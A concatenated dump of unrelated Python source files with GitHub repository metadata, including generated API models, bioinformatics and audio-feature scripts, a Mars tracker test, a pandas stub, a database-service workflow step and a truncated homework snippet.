    computation or node only sees one value for one identifier, and we can
    omit others.
    """
"laike9m@gmail.com"
] | laike9m@gmail.com |
0cc1a6763c74990c23270a72d398db34d9e14368 | c4f01eec090833762b884c2078161df087d09b0d | /Other documents/Term papers/Курсач (5 сем)/CourseWorkPolygon/venv/Lib/site-packages/pdhttp/models/wrist_button_states.py | 54f9774741221e78c328ee18e8104101b5dcb943 | [] | no_license | areyykarthik/Zhukouski_Pavel_BSU_Projects | 47a30144c5614b10af521a78fba538a0e9184efa | 3540979e680732d38e25a6b39f09338985de6743 | refs/heads/master | 2023-08-07T02:49:34.736155 | 2021-10-05T21:57:03 | 2021-10-05T21:57:03 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,076 | py | # coding: utf-8
"""
Robot API
Robot REST API # noqa: E501
OpenAPI spec version: 1.8.2
Generated by: https://github.com/swagger-api/swagger-codegen.git
"""
import pprint
import re # noqa: F401
import six
class WristButtonStates(dict):
    """NOTE: This class is auto generated by the swagger code generator program.

    Do not edit the class manually.
    """
    """
    Attributes:
      swagger_types (dict): The key is attribute name
                            and the value is attribute type.
      attribute_map (dict): The key is attribute name
                            and the value is json key in definition.
    """
    swagger_types = {
        'timestamp': 'float'
    }

    attribute_map = {
        'timestamp': 'timestamp'
    }

    def __init__(self, timestamp=None):  # noqa: E501
        """WristButtonStates - a model defined in Swagger"""  # noqa: E501
        # Generated models store values on private attributes even though the
        # class subclasses dict; serialization goes through to_dict().
        self._timestamp = None
        self.discriminator = None
        if timestamp is not None:
            self.timestamp = timestamp

    @property
    def timestamp(self):
        """Gets the timestamp of this WristButtonStates.  # noqa: E501

        :return: The timestamp of this WristButtonStates.  # noqa: E501
        :rtype: float
        """
        return self._timestamp

    @timestamp.setter
    def timestamp(self, timestamp):
        """Sets the timestamp of this WristButtonStates.

        :param timestamp: The timestamp of this WristButtonStates.  # noqa: E501
        :type: float
        """

        self._timestamp = timestamp

    def to_dict(self):
        """Returns the model properties as a dict"""
        # Recursively converts nested models/lists/dicts via their to_dict().
        result = {}

        for attr, _ in six.iteritems(self.swagger_types):
            value = getattr(self, attr)
            if isinstance(value, list):
                result[attr] = list(map(
                    lambda x: x.to_dict() if hasattr(x, "to_dict") else x,
                    value
                ))
            elif hasattr(value, "to_dict"):
                result[attr] = value.to_dict()
            elif isinstance(value, dict):
                result[attr] = dict(map(
                    lambda item: (item[0], item[1].to_dict())
                    if hasattr(item[1], "to_dict") else item,
                    value.items()
                ))
            else:
                result[attr] = value
        if issubclass(WristButtonStates, dict):
            for key, value in self.items():
                result[key] = value

        return result

    def to_str(self):
        """Returns the string representation of the model"""
        return pprint.pformat(self.to_dict())

    def __repr__(self):
        """For `print` and `pprint`"""
        return self.to_str()

    def __eq__(self, other):
        """Returns true if both objects are equal"""
        if not isinstance(other, WristButtonStates):
            return False

        return self.__dict__ == other.__dict__

    def __ne__(self, other):
        """Returns true if both objects are not equal"""
        return not self == other
"shist.pupust@mail.ru"
] | shist.pupust@mail.ru |
b432bf69f1eae4c948cc8044b5e361f046760d5a | 054bc8696bdd429e2b3ba706feb72c0fb604047f | /python/vcf/VCFSetID/VCFSetID.py | e2d14da422c7239b968475a01174e89a00f78923 | [] | no_license | wavefancy/WallaceBroad | 076ea9257cec8a3e1c8f53151ccfc7c5c0d7200f | fbd00e6f60e54140ed5b4e470a8bdd5edeffae21 | refs/heads/master | 2022-02-22T04:56:49.943595 | 2022-02-05T12:15:23 | 2022-02-05T12:15:23 | 116,978,485 | 2 | 3 | null | null | null | null | UTF-8 | Python | false | false | 2,450 | py | #!/usr/bin/env python3
"""
Set/Replace ID for VCF file. setID as : chr:pos:ref:alt
@Author: wavefancy@gmail.com
Usage:
VCFSetID.py [-i] [-s] [-m int]
VCFSetID.py -h | --help | -v | --version | -f | --format
Notes:
1. Read vcf file from stdin, setID as : chr:pos:ref:alt.
3. Output results to stdout.
Options:
-i Include old rsID.
-s Sort the ref and alt alleles, sorted([ref,alt])
-m int Set the maxmium ID lenght as int.
-h --help Show this screen.
-v --version Show version.
-f --format Show format example.
"""
import sys
from docopt import docopt
from signal import signal, SIGPIPE, SIG_DFL
signal(SIGPIPE, SIG_DFL)
def ShowFormat():
    '''Print worked examples of the input VCF and the rewritten output (help text for -f/--format).'''
    print('''
    input vcf example(abstracted):
    ----------------------
    chr2    13649   .       G       C

    out vcf example:
    ----------------------
    chr2    13649   chr2:13649:G:C  G       C
    ''');
if __name__ == '__main__':
    args = docopt(__doc__, version='1.0')
    #print(args)

    # -f/--format: show the example I/O and exit.
    if(args['--format']):
        ShowFormat()
        sys.exit(-1)

    # -i: append the old rsID after the generated chr:pos:ref:alt id.
    IncludeOld = False
    if args['-i']:
        IncludeOld = True
    # -m: truncate the generated ID to at most this many characters (-1 = off).
    MAX_ID_LEN = int(args['-m']) if args['-m'] else -1

    # infile.close()
    # `output` flips to True once the #CHROM header line has been seen; data
    # lines before it are dropped, ## meta lines are passed through.
    output = False
    for line in sys.stdin:
        line = line.strip()
        if line:
            if output:
                #output results.
                # Split only the first 8 columns so the FORMAT/sample columns
                # stay untouched as one trailing field.
                ss = line.split(None, maxsplit=7)
                # check if need to sort ref, alt alleles.
                stemp = sorted(ss[3:5]) if args['-s'] else ss[3:5]
                if IncludeOld:
                    ss[2] = ss[0] + ':' + ss[1] + ':' + stemp[0] + ':' + stemp[1] + ':' + ss[2]
                else:
                    ss[2] = ss[0] + ':' + ss[1] + ':' + stemp[0] + ':' + stemp[1]

                if MAX_ID_LEN > 0:
                    ss[2] = ss[2][0:MAX_ID_LEN]
                sys.stdout.write('%s\n'%('\t'.join(ss)))
            else:
                if line.startswith('##'):
                    sys.stdout.write('%s\n'%(line))
                elif line.startswith('#C') or line.startswith('#c'):
                    output = True
                    sys.stdout.write('%s\n'%(line))

    sys.stdout.close()
    sys.stderr.flush()
    sys.stderr.close()
| [
"wavefancy@gmail.com"
] | wavefancy@gmail.com |
fae7eca82ace71668d57d4156e436c6965ab22b9 | 132b261b16338cb7b9297bd04eaaaafe34bde89e | /sendSMSSkillLambda/package/ask_sdk_model/interfaces/audioplayer/error.py | 0c4c22d8473612ca7097a846067b1f065118c3e7 | [
"Apache-2.0"
] | permissive | ziniman/aws-alexa-lambda-workshop | 2835b998272b01856d3dbea6481e9ee4457da2f2 | d1e291ebd3e20132098541c92735d29491bfc932 | refs/heads/master | 2020-06-25T22:58:04.814822 | 2019-09-08T10:37:00 | 2019-09-08T10:37:00 | 199,446,036 | 0 | 3 | Apache-2.0 | 2019-09-05T09:03:12 | 2019-07-29T12:11:58 | Python | UTF-8 | Python | false | false | 3,562 | py | # coding: utf-8
#
# Copyright 2019 Amazon.com, Inc. or its affiliates. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"). You may not use this file
# except in compliance with the License. A copy of the License is located at
#
# http://aws.amazon.com/apache2.0/
#
# or in the "license" file accompanying this file. This file is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the License for
# the specific language governing permissions and limitations under the License.
#
import pprint
import re # noqa: F401
import six
import typing
from enum import Enum
if typing.TYPE_CHECKING:
from typing import Dict, List, Optional, Union
from datetime import datetime
from ask_sdk_model.interfaces.audioplayer.error_type import ErrorType
class Error(object):
    """AudioPlayer error payload (auto-generated by swagger-codegen; do not
    hand-edit — regenerate instead).

    :param message:
    :type message: (optional) str
    :param object_type:
    :type object_type: (optional) ask_sdk_model.interfaces.audioplayer.error_type.ErrorType

    """
    deserialized_types = {
        'message': 'str',
        'object_type': 'ask_sdk_model.interfaces.audioplayer.error_type.ErrorType'
    }  # type: Dict

    attribute_map = {
        'message': 'message',
        'object_type': 'type'
    }  # type: Dict

    def __init__(self, message=None, object_type=None):
        # type: (Optional[str], Optional[ErrorType]) -> None
        """
        :param message:
        :type message: (optional) str
        :param object_type:
        :type object_type: (optional) ask_sdk_model.interfaces.audioplayer.error_type.ErrorType
        """
        self.__discriminator_value = None  # type: str

        self.message = message
        self.object_type = object_type

    def to_dict(self):
        # type: () -> Dict[str, object]
        """Returns the model properties as a dict"""
        # Recursively serializes nested models (via to_dict) and unwraps Enum
        # members to their values.
        result = {}  # type: Dict

        for attr, _ in six.iteritems(self.deserialized_types):
            value = getattr(self, attr)
            if isinstance(value, list):
                result[attr] = list(map(
                    lambda x: x.to_dict() if hasattr(x, "to_dict") else
                    x.value if isinstance(x, Enum) else x,
                    value
                ))
            elif isinstance(value, Enum):
                result[attr] = value.value
            elif hasattr(value, "to_dict"):
                result[attr] = value.to_dict()
            elif isinstance(value, dict):
                result[attr] = dict(map(
                    lambda item: (item[0], item[1].to_dict())
                    if hasattr(item[1], "to_dict") else
                    (item[0], item[1].value)
                    if isinstance(item[1], Enum) else item,
                    value.items()
                ))
            else:
                result[attr] = value

        return result

    def to_str(self):
        # type: () -> str
        """Returns the string representation of the model"""
        return pprint.pformat(self.to_dict())

    def __repr__(self):
        # type: () -> str
        """For `print` and `pprint`"""
        return self.to_str()

    def __eq__(self, other):
        # type: (object) -> bool
        """Returns true if both objects are equal"""
        if not isinstance(other, Error):
            return False

        return self.__dict__ == other.__dict__

    def __ne__(self, other):
        # type: (object) -> bool
        """Returns true if both objects are not equal"""
        return not self == other
| [
"oritalul@amazon.com"
] | oritalul@amazon.com |
873ef77356637ce0e4537e113fbf9e125a3bb52c | a3597afc5aaf15723dba35d5b114f2b3e129a168 | /mars/services/lifecycle/supervisor/tests/test_tracker.py | df62277ac9f2722e4ab8cefc3bfe49accb92f48e | [
"BSD-3-Clause",
"CC0-1.0",
"ISC",
"Apache-2.0",
"LicenseRef-scancode-unknown-license-reference",
"BSD-2-Clause",
"MIT"
] | permissive | hekaisheng/mars | 5edff06194779d6005bd768dabadd9191c812cb3 | 49ce0c1c691d405040e53b8eb8d8af9b7e87ae55 | refs/heads/master | 2023-01-10T06:24:05.532213 | 2021-12-07T08:21:56 | 2021-12-07T08:21:56 | 160,764,275 | 0 | 2 | Apache-2.0 | 2021-01-10T08:43:43 | 2018-12-07T03:12:41 | Python | UTF-8 | Python | false | false | 3,052 | py | # Copyright 1999-2021 Alibaba Group Holding Ltd.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import numpy as np
import pytest
from ..... import oscar as mo
from ..... import tensor as mt
from .....core import tile
from ....cluster import MockClusterAPI
from ....meta import MockMetaAPI
from ....session import MockSessionAPI
from ....storage import MockStorageAPI, DataNotExist
from ... import TileableNotTracked
from ...supervisor.tracker import LifecycleTrackerActor
@pytest.mark.asyncio
async def test_tracker():
    """End-to-end check of LifecycleTrackerActor: track/incref/decref a tiled
    tensor's chunks, then verify meta and data are released and untracked
    tileables raise."""
    pool = await mo.create_actor_pool("127.0.0.1", n_process=0)

    async with pool:
        addr = pool.external_address
        session_id = "test_session"

        # Stand up the mock service stack the tracker depends on.
        await MockClusterAPI.create(addr)
        await MockSessionAPI.create(addr, session_id=session_id)
        meta_api = await MockMetaAPI.create(session_id, addr)
        storage_api = await MockStorageAPI.create(session_id, addr)

        try:
            tracker = await mo.create_actor(
                LifecycleTrackerActor,
                session_id,
                uid=LifecycleTrackerActor.gen_uid(session_id),
                address=pool.external_address,
            )

            # Build a tiled tensor and register meta + data for each chunk.
            t = mt.random.rand(15, 5, chunk_size=5)
            t = tile(t)
            tileable_key = t.key
            chunk_keys = []
            for c in t.chunks:
                chunk_keys.append(c.key)
                await meta_api.set_chunk_meta(c, bands=[(addr, "numa-0")])
                await storage_api.put(c.key, np.random.rand(5, 5))
            await tracker.track(tileable_key, chunk_keys)

            # Balanced incref/decref should drive all ref counts back to zero.
            await tracker.incref_tileables([tileable_key])
            await tracker.incref_chunks(chunk_keys[:2])
            await tracker.decref_chunks(chunk_keys[:2])
            await tracker.decref_tileables([tileable_key])
            assert len(await tracker.get_all_chunk_ref_counts()) == 0

            # Zero refcount must have removed both chunk meta and stored data.
            for chunk_key in chunk_keys:
                with pytest.raises(KeyError):
                    await meta_api.get_chunk_meta(chunk_key)

            for chunk_key in chunk_keys:
                with pytest.raises(DataNotExist):
                    await storage_api.get(chunk_key)

            # Ref operations on unknown tileables raise TileableNotTracked.
            with pytest.raises(TileableNotTracked):
                await tracker.incref_tileables(["not_tracked"])
            with pytest.raises(TileableNotTracked):
                await tracker.decref_tileables(["not_tracked"])
        finally:
            await MockStorageAPI.cleanup(pool.external_address)
            await MockClusterAPI.cleanup(pool.external_address)
| [
"noreply@github.com"
] | hekaisheng.noreply@github.com |
4600df2a769dabba26bb553fe5ece02566fc38c3 | 5598fe9705c7066407ee02245ae5f98f3fec3a54 | /utils.py | 309482bf5635e5221ceec060f59ecba73c132a36 | [] | no_license | EgorLakomkin/TopCoderSpokenLanguageRecognition | 8d2bb1608cc6d4eaf25d4bc43c48ce9e7f68bb4a | 73df1b4742a71fb825d78e7f15f3a2a54339d4ef | refs/heads/master | 2021-01-10T17:10:34.030434 | 2015-11-14T11:03:47 | 2015-11-14T11:03:47 | 46,171,260 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 4,253 | py | import os
from subprocess import check_call
from path import Path
import librosa
from cPickle import Pickler, Unpickler
import cPickle
from multiprocessing import Pool
import numpy as np
from features_storage import FeatureStorage
# Layout of the unpacked contest data set.
DATA_DIR = './data'
# Directory where pickled feature matrices are cached between runs.
FEATURE_STORAGE = 'features_storage'
TRAINING_FILE = os.path.join(DATA_DIR, 'trainingset.csv')  # rows: "<mp3 name>,<language>"
TESTING_FILE = os.path.join(DATA_DIR, 'testingset.csv' )   # rows: one mp3 filename each
FILES_DIR = os.path.join( DATA_DIR, 'data' )               # converted .wav files live here
def load_classes_info():
    """Build the language-name <-> class-index mappings from TRAINING_FILE.

    Indices are assigned in order of first appearance, so repeated runs over
    the same file produce identical mappings.
    """
    name_to_idx, idx_to_name = {}, {}
    with open(TRAINING_FILE) as fh:
        for row in fh:
            _, language = row.strip().split(',')
            if language not in name_to_idx:
                idx = len(name_to_idx)
                name_to_idx[language] = idx
                idx_to_name[idx] = language
    return name_to_idx, idx_to_name
def get_mfcc(signal, n_fft = 4096, hop_length = 1024, sr=44100, n_mfcc=20, logscaled=True):
    """Computes the mel-frequency cepstral coefficients of a signal
    ARGS
        signal: audio signal <number array>
        n_fft: FFT size <int>
        hop_length : hop length <int>
        sr: sampling rate <int>
        n_mfcc: number of MFC coefficients <int>
        logscaled: log-scale the magnitudes of the spectrogram <bool>

    RETURN
        mfcc: mel-frequency cepstral coefficients <number numpy array>
    """
    # Mel spectrogram first; MFCCs are then taken from its (optionally
    # log-scaled) magnitudes.
    S = librosa.feature.melspectrogram(signal, sr=sr, n_fft=n_fft, hop_length=hop_length)
    if logscaled:
        log_S = librosa.logamplitude(S)
    mfcc = librosa.feature.mfcc(S=log_S, n_mfcc=n_mfcc)
    return mfcc
def load_test_features(test_filename, feature_func, limit = None):
pool = Pool()
test_data = get_all_test_data()
if limit:
test_data = test_data[:limit]
feature_storage = FeatureStorage( name = test_filename, base_dir = FEATURE_STORAGE )
if not feature_storage.exists():
print "Loading test from scratch"
for_features = [ (path, None) for (path, filename ) in test_data ]
X_test_transformed = pool.map( feature_func, for_features )
print "Dumping test features"
feature_storage.save( X_test_transformed )
print "Finished dumping"
else:
print "Loading test from cache"
X_test_transformed = feature_storage.load()
pool.close()
pool.terminate()
return X_test_transformed
def shuffle_in_unison_inplace(a, b):
    """Reorder *a* and *b* by one shared random permutation of their rows.

    Despite the name, nothing is shuffled in place: fancy indexing returns
    new arrays, and the originals are left untouched.  The same permutation
    is applied to both inputs, so row i of the first result still lines up
    with entry i of the second.
    """
    n_rows = a.shape[0]
    assert n_rows == b.shape[0]
    order = np.random.permutation(n_rows)
    return a[order], b[order]
def load_train_features( train_filename, feature_func, limit = None ):
    """Compute (or load from cache) feature vectors for the training set.

    ARGS
        train_filename: cache name handed to FeatureStorage <str>
        feature_func: callable mapping a (path, class_index) pair to features
        limit: optional cap on the number of training files processed

    RETURN
        list of per-file feature arrays, in training-set order
    """
    storage = FeatureStorage( name = train_filename, base_dir = FEATURE_STORAGE )
    if storage.exists():
        print("Loading train from cache")
        return storage.load()
    samples = return_all_train_files()
    if limit is not None:
        samples = samples[:limit]
    print("Started processing train")
    # Fan the (path, label) pairs out over a process pool.
    pool = Pool()
    features = pool.map( feature_func, samples )
    pool.close()
    pool.terminate()
    print("Dumping train features")
    storage.save( features )
    return features
def convert_to_wav(dir):
    """Transcode every .mp3 found under *dir* to a 44.1 kHz .wav via avconv."""
    # NOTE(review): walkfiles() is the path.py API, not pathlib -- confirm
    # which `Path` this module imports at the top of the file.
    train_dir = Path( dir )
    for f in train_dir.walkfiles('*.mp3'):
        name = f.name.replace('.mp3', '') + '.wav'
        # check_call raises CalledProcessError if avconv exits non-zero.
        # NOTE(review): output is always written directly under *dir* (f.name
        # carries no subdirectory), so mp3s from different subdirectories with
        # the same basename would collide -- verify the dataset is flat.
        check_call(['avconv', '-ar', '44100', '-i', str(f), os.path.abspath( os.path.join( dir, name ) )])
def get_all_test_data():
    """Read TESTING_FILE and return [(wav_path, original_mp3_name), ...].

    Each line of TESTING_FILE is an mp3 filename; the returned path points
    at the corresponding .wav file inside FILES_DIR, while the second tuple
    element keeps the original mp3 name for reporting.
    """
    def _entry(raw_line):
        mp3_name = raw_line.strip()
        wav_path = os.path.join(FILES_DIR, mp3_name.replace('.mp3', '.wav'))
        return (wav_path, mp3_name)

    return [_entry(line) for line in open(TESTING_FILE)]
def return_all_train_files():
    """Read TRAINING_FILE and return [(wav_path, class_index), ...].

    Class names from the CSV are translated to dense integer indices via
    load_classes_info(); filenames are rewritten from .mp3 to the .wav
    counterparts living in FILES_DIR.
    """
    label_index, _ = load_classes_info()
    samples = []
    for row in open(TRAINING_FILE):
        name, label_name = row.strip().split(',')
        wav_path = os.path.join(FILES_DIR, name.replace('.mp3', '.wav'))
        samples.append((wav_path, label_index[label_name]))
    return samples
if __name__ == "__main__":
    # One-off entry point: transcode the raw mp3 dataset under ./data to wav.
    convert_to_wav('./data')
| [
"you@example.com"
] | you@example.com |
ff2417be8026f879c74193c9a68d160b8a26196d | c8a04384030c3af88a8e16de4cedc4ef8aebfae5 | /stubs/pandas/tests/frame/test_asof.pyi | cf6de5856ad19886ade3d96fdb920a6514d14236 | [
"MIT"
] | permissive | Accern/accern-xyme | f61fce4b426262b4f67c722e563bb4297cfc4235 | 6ed6c52671d02745efabe7e6b8bdf0ad21f8762c | refs/heads/master | 2023-08-17T04:29:00.904122 | 2023-05-23T09:18:09 | 2023-05-23T09:18:09 | 226,960,272 | 3 | 2 | MIT | 2023-07-19T02:13:18 | 2019-12-09T20:21:59 | Python | UTF-8 | Python | false | false | 718 | pyi | # Stubs for pandas.tests.frame.test_asof (Python 3)
#
# NOTE: This dynamically typed stub was automatically generated by stubgen.
# pylint: disable=unused-argument,redefined-outer-name,no-self-use,invalid-name
# pylint: disable=relative-beyond-top-level
from typing import Any
# Stub for what appears to be the pytest fixture consumed by the test methods
# below (each takes a `date_range_frame` parameter) -- signatures only.
def date_range_frame() -> Any:
    ...
class TestFrameAsof:
    """Autogenerated (stubgen) type stubs for pandas' DataFrame.asof tests.

    Bodies are intentionally Ellipsis per .pyi convention; only the
    signatures matter to the type checker.
    """
    def test_basic(self, date_range_frame: Any) -> None:
        ...
    def test_subset(self, date_range_frame: Any) -> None:
        ...
    def test_missing(self, date_range_frame: Any) -> None:
        ...
    def test_all_nans(self, date_range_frame: Any) -> None:
        ...
    def test_time_zone_aware_index(self, stamp: Any, expected: Any) -> None:
        ...
| [
"josua.krause@gmail.com"
] | josua.krause@gmail.com |
2e908b9f14dad212166d5d26c5846a4014df8854 | 750d8ade6abc2b3bd6a24e660a4992114db6ac0c | /lib/music/plex/__init__.py | 6b0e02e3511aa7df7bc5c68e754877876aaa33c2 | [] | no_license | dskrypa/music_manager | 8a00a4bd7b32a87dab2441614c94346fa87c4f13 | ad7265fbd203962a4bf9cf6444c8e10d561a307c | refs/heads/main | 2023-08-09T06:26:46.592118 | 2023-08-08T11:38:08 | 2023-08-08T11:38:08 | 234,730,172 | 5 | 0 | null | null | null | null | UTF-8 | Python | false | false | 4,016 | py | """
Package for working with the Plex API, and for syncing Plex ratings with ratings stored in ID3 tags.
Note on fetchItems:
The kwargs to fetchItem/fetchItems use __ to access nested attributes, but the only nested attributes available are
those that are returned in the items in ``plex.server.query(plex._ekey(search_type))``, not the higher level objects.
Example available attributes::\n
>>> data = plex.server.query(plex._ekey('track'))
>>> media = [c for c in data[0]]
>>> for m in media:
... m
... m.attrib
... print(', '.join(sorted(m.attrib)))
... for part in m:
... part
... part.attrib
... print(', '.join(sorted(part.attrib)))
...
<Element 'Media' at 0x000001E4E3971458>
{'id': '76273', 'duration': '238680', 'bitrate': '320', 'audioChannels': '2', 'audioCodec': 'mp3', 'container': 'mp3'}
audioChannels, audioCodec, bitrate, container, duration, id
<Element 'Part' at 0x000001E4E48D9458>
{'id': '76387', 'key': '/library/parts/76387/1555183134/file.mp3', 'duration': '238680', 'file': '/path/to/song.mp3', 'size': '9773247', 'container': 'mp3', 'hasThumbnail': '1'}
container, duration, file, hasThumbnail, id, key, size
>>> data = plex.server.query(plex._ekey('album'))
>>> data[0]
<Element 'Directory' at 0x000001E4E3C92458>
>>> print(', '.join(sorted(data[0].attrib.keys())))
addedAt, guid, index, key, loudnessAnalysisVersion, originallyAvailableAt, parentGuid, parentKey, parentRatingKey, parentThumb, parentTitle, ratingKey, summary, thumb, title, type, updatedAt, year
>>> elements = [c for c in data[0]]
>>> for e in elements:
... e
... e.attrib
... for sub_ele in e:
... sub_ele
... sub_ele.attrib
...
<Element 'Genre' at 0x000001E4E3C929F8>
{'tag': 'K-pop'}
Example playlist syncs::\n
>>> plex.sync_playlist('K-Pop 3+ Stars', userRating__gte=6, genre__like='[kj]-?pop')
2019-06-01 08:53:39 EDT INFO __main__ 178 Creating playlist K-Pop 3+ Stars with 485 tracks
>>> plex.sync_playlist('K-Pop 4+ Stars', userRating__gte=8, genre__like='[kj]-?pop')
2019-06-01 08:54:13 EDT INFO __main__ 178 Creating playlist K-Pop 4+ Stars with 257 tracks
>>> plex.sync_playlist('K-Pop 5 Stars', userRating__gte=10, genre__like='[kj]-?pop')
2019-06-01 08:54:22 EDT INFO __main__ 178 Creating playlist K-Pop 5 Stars with 78 tracks
>>> plex.sync_playlist('K-Pop 5 Stars', userRating__gte=10, genre__like='[kj]-?pop')
2019-06-01 08:54:58 EDT VERBOSE __main__ 196 Playlist K-Pop 5 Stars does not contain any tracks that should be removed
2019-06-01 08:54:58 EDT VERBOSE __main__ 208 Playlist K-Pop 5 Stars is not missing any tracks
2019-06-01 08:54:58 EDT INFO __main__ 212 Playlist K-Pop 5 Stars contains 78 tracks and is already in sync with the given criteria
Object and element attributes and elements available for searching:
- track:
- attributes: addedAt, duration, grandparentGuid, grandparentKey, grandparentRatingKey, grandparentThumb,
grandparentTitle, guid, index, key, originalTitle, parentGuid, parentIndex, parentKey, parentRatingKey,
parentThumb, parentTitle, ratingKey, summary, thumb, title, type, updatedAt
- elements: media
- album:
- attributes: addedAt, guid, index, key, loudnessAnalysisVersion, originallyAvailableAt, parentGuid, parentKey,
parentRatingKey, parentThumb, parentTitle, ratingKey, summary, thumb, title, type, updatedAt, year
- elements: genre
- artist:
- attributes: addedAt, guid, index, key, lastViewedAt, ratingKey, summary, thumb, title, type, updatedAt,
userRating, viewCount
- elements: genre
- media:
- attributes: audioChannels, audioCodec, bitrate, container, duration, id
- elements: part
- genre:
- attributes: tag
- part:
- attributes: container, duration, file, hasThumbnail, id, key, size
:author: Doug Skrypa
"""
from .server import LocalPlexServer
| [
"dskrypa@gmail.com"
] | dskrypa@gmail.com |
12c9bc75b85fee4fddb162344fe499e27e861437 | ca7aa979e7059467e158830b76673f5b77a0f5a3 | /Python_codes/p03475/s093541910.py | fba06f3b1736933db986f94190f598cc10fff7bf | [] | no_license | Aasthaengg/IBMdataset | 7abb6cbcc4fb03ef5ca68ac64ba460c4a64f8901 | f33f1c5c3b16d0ea8d1f5a7d479ad288bb3f48d8 | refs/heads/main | 2023-04-22T10:22:44.763102 | 2021-05-13T17:27:22 | 2021-05-13T17:27:22 | 367,112,348 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 161 | py | N=int(input())
l=[0]*N
for i in range(N-1):
c,s,f=map(int,input().split())
l[i]=c+s
for j in range(i):
l[j]=max(l[j],s,-(-l[j]//f)*f)+c
for i in l:print(i) | [
"66529651+Aastha2104@users.noreply.github.com"
] | 66529651+Aastha2104@users.noreply.github.com |
b201b0ea2d5386b9e8b4dafdfd2fcb3d93cd1298 | b665fe52aceca20944f5c7dfc74688370e514666 | /dbaas/workflow/steps/redis/resize/__init__.py | 5dca9388a256f4780a11cbdaff1ff49171827266 | [] | no_license | tsunli/database-as-a-service | 5e68ee22b1b46d30c6d83278407494971097d451 | 73573d495f62829259f656dfa0b642b9be4f2ead | refs/heads/master | 2021-01-24T15:06:42.029936 | 2015-07-02T21:42:44 | 2015-07-02T21:42:44 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,626 | py | # -*- coding: utf-8 -*-
import logging
from dbaas_cloudstack.models import HostAttr
from util import exec_remote_command
from workflow.exceptions.error_codes import DBAAS_0015
from util import full_stack
from util import build_context_script
LOG = logging.getLogger(__name__)
def run_vm_script(workflow_dict, context_dict, script):
    """Render *script* against each instance's context and run it over SSH.

    For every instance in workflow_dict['instances_detail'] the script
    template is filled in (host address/port plus the merged context) and
    executed on the remote VM with that host's CloudStack credentials.

    Returns True when every instance succeeded; on any failure the error
    code and traceback are appended to workflow_dict['exceptions'] and
    False is returned.
    """
    try:
        instances_detail = workflow_dict['instances_detail']
        # Merge the two contexts; keys from initial_context_dict win on
        # collision.  (Python 2: dict.items() returns lists, so + concatenates.)
        final_context_dict = dict(context_dict.items() + workflow_dict['initial_context_dict'].items())
        for instance_detail in instances_detail:
            instance = instance_detail['instance']
            host = instance.hostname
            host_csattr = HostAttr.objects.get(host=host)
            final_context_dict['HOSTADDRESS'] = instance.address
            final_context_dict['PORT'] = instance.port
            command = build_context_script(final_context_dict, script)
            output = {}
            return_code = exec_remote_command(server = host.address,
                                              username = host_csattr.vm_user,
                                              password = host_csattr.vm_password,
                                              command = command,
                                              output = output)
            # Shell convention: a non-zero exit status means failure.
            if return_code:
                # Bug fix: `raise Exception, "..."` is Python-2-only syntax;
                # the call form below is equivalent and also valid on Python 3.
                raise Exception("Could not run script. Output: {}".format(output))
        return True
    except Exception:
        # Deliberately broad: any failure in this workflow step is converted
        # into an error-code + traceback entry and reported as False.
        traceback = full_stack()
        workflow_dict['exceptions']['error_codes'].append(DBAAS_0015)
        workflow_dict['exceptions']['traceback'].append(traceback)
        return False
| [
"raposo.felippe@gmail.com"
] | raposo.felippe@gmail.com |
d26831364d5626bb2c597b32de481c75ecd14631 | 29a435f155f6b49b97e41241ef01274a15e9b407 | /collective/packagekit/browser/util_view.py | 314997a577dbc4bf2c679f3769306bb1a9686ce2 | [] | no_license | kagesenshi/collective.packagekit | b55d1763bf97e884b89c9eb8f9b51c497f8ad80b | 1fcefc10f1bf71b60dd671dff4783dc390c87e63 | refs/heads/master | 2020-06-03T18:02:22.124810 | 2011-12-29T14:18:44 | 2011-12-29T14:18:44 | 3,011,085 | 2 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,146 | py | from five import grok
from collective.packagekit.pkappbehavior import IPackageKitApplicationBehavior
from zope.interface import Interface
from itertools import izip
grok.templatedir('templates')
from zope.security import checkPermission
class PKAppUtilView(grok.View):
    """Helper view exposing utility methods to the pkapp templates."""

    grok.name('pkapp_util')
    grok.context(IPackageKitApplicationBehavior)

    def render(self):
        # NOTE(review): rendering falls through to the view's __str__ --
        # confirm the grok template wiring provides it.
        return str(self)

    def gridslice(self, items, size=5):
        """Split *items* into tuples of *size*, plus the leftover tail.

        The tail is appended as a (possibly empty) list slice, matching the
        idiom from taylanpince.com's "slicing a list into equal groups" post.
        """
        grouped = list(izip(*[iter(items)] * size))
        tail = items[len(items) - (len(items) % size):]
        return grouped + [tail]

    def fedora_packages(self):
        """Identifiers of the packages flagged for the fedora distribution."""
        return set(
            pkg['identifier']
            for pkg in self.context.pk_packages
            if pkg['distribution'] == 'fedora'
        )

    def images(self):
        """Catalog brains for Image objects stored directly inside this app."""
        here = '/'.join(self.context.getPhysicalPath())
        return self.context.portal_catalog(
            path={
                'query': here,
                'depth': 1
            },
            portal_type='Image'
        )

    def can_add(self):
        """Whether the current user may add content to this application."""
        return checkPermission('cmf.AddPortalContent', self.context)
| [
"izhar@inigo-tech.com"
] | izhar@inigo-tech.com |
bed7e0c91fb9452819a192221524a55e26a1d1c1 | 163bbb4e0920dedd5941e3edfb2d8706ba75627d | /Code/CodeRecords/2189/60795/256420.py | 444dea8a9fbb5a06c9caaf11ecf79c4b1dc786bf | [] | no_license | AdamZhouSE/pythonHomework | a25c120b03a158d60aaa9fdc5fb203b1bb377a19 | ffc5606817a666aa6241cfab27364326f5c066ff | refs/heads/master | 2022-11-24T08:05:22.122011 | 2020-07-28T16:21:24 | 2020-07-28T16:21:24 | 259,576,640 | 2 | 1 | null | null | null | null | UTF-8 | Python | false | false | 1,327 | py | def test(num):
num = int(num)
at = 0
th, hu, de, fa = 0, 0, 0, 0
if num > 10 & num < 100:
fa = num % 10
de = (num - fa) / 10
